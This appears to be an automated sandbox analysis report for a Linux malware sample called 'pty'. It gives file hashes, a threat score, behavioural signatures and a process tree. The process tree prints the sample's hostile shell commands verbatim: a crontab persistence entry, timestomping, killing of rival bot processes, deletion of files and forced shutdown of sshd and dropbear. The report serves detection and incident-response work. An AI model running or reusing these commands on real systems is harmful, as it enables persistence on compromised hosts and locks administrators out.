Analysis
-
max time kernel
0s -
max time network
103s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-en-20211208 kernel:4.15.0-161-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
08-08-2022 11:59
Static task
static1
Behavioral task
behavioral1
Sample
pty
Resource
ubuntu1804-amd64-en-20211208
ubuntu-18.04-amd64
5 signatures
150 seconds
General
-
Target
pty
-
Size
43KB
-
MD5
4828b6dfe2f542f5763109c015a1fc57
-
SHA1
08b0e90b15ef106b1a67273788ab42763b728e0a
-
SHA256
af736d0466d0c88fe66666676ca09462fddedbbe8befe49dd2dc691053c293c6
-
SHA512
242cb978a8dff0857bd83618b68b07834794a67a86a9421fc55934db220254e20395825b089b9be6fda577cee9451d3d9eaa66de2835932591ccd2d681481796
Score
8/10
Malware Config
Signatures
-
Modifies hosts file 1 IoCs
Adds entries to the hosts file, which maps hostnames to IP addresses.
Processes:
sudodescription ioc process /etc/hosts /etc/hosts sudo -
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to the DNS resolver configuration file.
-
Write file to user bin folder 1 TTPs 2 IoCs
Processes:
serviceservicedescription ioc process /usr/sbin/service /usr/sbin/service service /usr/sbin/service /usr/sbin/service service -
Reads runtime system information 64 IoCs
Reads data from the /proc virtual filesystem.
Processes:
killallkillallkillallsystemctlkillallkillallkillallsystemctlsystemctlkillallkillallkillallsystemctlkillallsystemctlsystemctlsystemctlsystemctldescription ioc process /proc/347/cmdline /proc/347/cmdline killall /proc/599/stat /proc/599/stat killall /proc/339/stat /proc/339/stat killall /proc/cmdline /proc/cmdline systemctl /proc/17/stat /proc/17/stat killall /proc/286/cmdline /proc/286/cmdline killall /proc/78/stat /proc/78/stat killall /proc/578/stat /proc/578/stat killall /proc/193/stat /proc/193/stat killall /proc/251/stat /proc/251/stat killall /proc/1/sched /proc/1/sched systemctl /proc/cmdline /proc/cmdline systemctl /proc/28/stat /proc/28/stat killall /proc/31/stat /proc/31/stat killall /proc/34/stat /proc/34/stat killall /proc/27/stat /proc/27/stat killall /proc/169/stat /proc/169/stat killall /proc/83/stat /proc/83/stat killall /proc/356/stat /proc/356/stat killall /proc/161/stat /proc/161/stat killall /proc/223/stat /proc/223/stat killall /proc/32/stat /proc/32/stat killall /proc/1/sched /proc/1/sched systemctl /proc/192/stat /proc/192/stat killall /proc/333/stat /proc/333/stat killall /proc/22/stat /proc/22/stat killall /proc/155/stat /proc/155/stat killall /proc/161/stat /proc/161/stat killall /proc/420/stat /proc/420/stat killall /proc/1/environ /proc/1/environ systemctl /proc/sys/kernel/osrelease /proc/sys/kernel/osrelease systemctl /proc/28/stat /proc/28/stat killall /proc/153/stat /proc/153/stat killall /proc/1/stat /proc/1/stat killall /proc/16/stat /proc/16/stat killall /proc/352/stat /proc/352/stat killall /proc/418/stat /proc/418/stat killall /proc/filesystems /proc/filesystems systemctl /proc/164/stat /proc/164/stat killall /proc/85/stat /proc/85/stat killall /proc/8/stat /proc/8/stat killall /proc/1/environ /proc/1/environ systemctl /proc/17/stat /proc/17/stat killall /proc/286/stat /proc/286/stat killall /proc/8/stat /proc/8/stat killall /proc/575/stat /proc/575/stat killall /proc/36/stat /proc/36/stat killall /proc/341/stat /proc/341/stat 
killall /proc/347/cmdline /proc/347/cmdline killall /proc/223/stat /proc/223/stat killall /proc/356/stat /proc/356/stat killall /proc/193/cmdline /proc/193/cmdline killall /proc/1/environ /proc/1/environ systemctl /proc/1/sched /proc/1/sched systemctl /proc/14/stat /proc/14/stat killall /proc/169/stat /proc/169/stat killall /proc/169/stat /proc/169/stat killall /proc/159/stat /proc/159/stat killall /proc/4/stat /proc/4/stat killall /proc/15/stat /proc/15/stat killall /proc/3/stat /proc/3/stat killall /proc/159/stat /proc/159/stat killall /proc/81/stat /proc/81/stat killall /proc/25/stat /proc/25/stat killall -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
catrmdescription ioc /tmp/.xs /tmp/.xs /tmp/.xs/*.pid /tmp/.xs/*.pid cat /tmp/.xs/* /tmp/.xs/* rm
Processes
-
/tmp/pty/tmp/pty1⤵
-
/bin/shsh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"1⤵
-
/bin/rmrm -rf /var/run/wgsh2⤵
-
/bin/shsh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"1⤵
-
/bin/rmrm -rf /var/run/bbsh2⤵
-
/bin/shsh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"1⤵
-
/bin/rmrm -rf /var/run/pty2⤵
-
/bin/shsh -c "killall -9 arm > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 arm2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 mips > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 mips2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 mipsel > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 mipsel2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 powerpc > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 powerpc2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 ppc > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 ppc2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 daemon.armv4l.mod2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 daemon.i686.mod2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 daemon.mips.mod2⤵
- Reads runtime system information
-
/bin/shsh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"1⤵
-
/usr/bin/killallkillall -9 daemon.mipsel.mod2⤵
- Reads runtime system information
-
/bin/shsh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"1⤵
-
/bin/shsh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"1⤵
-
/bin/rmrm -rf "/tmp/.xs/*"2⤵
- Writes file to tmp directory
-
/bin/catcat "/tmp/.xs/*.pid"1⤵
- Writes file to tmp directory
-
/bin/shsh -c "touch -acmr /bin/ls /tmp/pty"1⤵
-
/usr/bin/touchtouch -acmr /bin/ls /tmp/pty2⤵
-
/bin/shsh -c "(crontab -l | grep -v \"/tmp/pty\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"1⤵
-
/bin/grepgrep -v /tmp/pty1⤵
-
/usr/bin/crontabcrontab -l1⤵
-
/bin/grepgrep -v "no cron"1⤵
-
/bin/grepgrep -v lesshts/run.sh1⤵
-
/bin/shsh -c "echo \"* * * * * /tmp/pty > /dev/null 2>&1 &\" >> /var/run/.x001804289383"1⤵
-
/bin/shsh -c "crontab /var/run/.x001804289383"1⤵
-
/usr/bin/crontabcrontab /var/run/.x0018042893832⤵
-
/bin/shsh -c "rm -rf /var/run/.x001804289383"1⤵
-
/bin/rmrm -rf /var/run/.x0018042893832⤵
-
/bin/shsh -c "/bin/uname -n"1⤵
-
/bin/uname/bin/uname -n2⤵
-
/bin/shsh -c "/bin/uname -n"1⤵
-
/bin/uname/bin/uname -n2⤵
-
/bin/shsh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; service sshd stop ; sudo service sshd stop ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 & "1⤵
-
/bin/catcat /var/run/dropbear.pid1⤵
-
/bin/catcat /var/run/sshd.pid1⤵
-
/usr/sbin/serviceservice sshd stop1⤵
- Write file to user bin folder
-
/usr/bin/basenamebasename /usr/sbin/service2⤵
-
/usr/bin/basenamebasename /usr/sbin/service2⤵
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
-
/bin/systemctlsystemctl -p Triggers show dbus.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show ssh.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show syslog.socket2⤵
- Reads runtime system information
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket2⤵
-
/bin/systemctlsystemctl -p Triggers show uuidd.socket2⤵
- Reads runtime system information
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵
-
/bin/systemctlsystemctl stop sshd.service1⤵
- Reads runtime system information
-
/usr/bin/sudosudo service sshd stop1⤵
- Modifies hosts file
- Writes DNS configuration
-
/usr/sbin/serviceservice sshd stop2⤵
- Write file to user bin folder
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Reads runtime system information
-
/bin/systemctlsystemctl -p Triggers show dbus.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show ssh.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show syslog.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket3⤵
- Reads runtime system information
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket3⤵
- Reads runtime system information
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket3⤵
- Reads runtime system information
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket3⤵
-
/bin/systemctlsystemctl -p Triggers show uuidd.socket3⤵
-
/usr/local/sbin/systemctlsystemctl stop sshd.service2⤵
-
/usr/local/bin/systemctlsystemctl stop sshd.service2⤵
-
/usr/sbin/systemctlsystemctl stop sshd.service2⤵
-
/usr/bin/systemctlsystemctl stop sshd.service2⤵
-
/sbin/systemctlsystemctl stop sshd.service2⤵
-
/bin/systemctlsystemctl stop sshd.service2⤵
- Reads runtime system information
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"1⤵
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"1⤵
-
/usr/bin/killallkillall -9 sshd dropbear1⤵
- Reads runtime system information
-
/bin/pidofpidof sshd1⤵
-
/bin/pidofpidof dropbear1⤵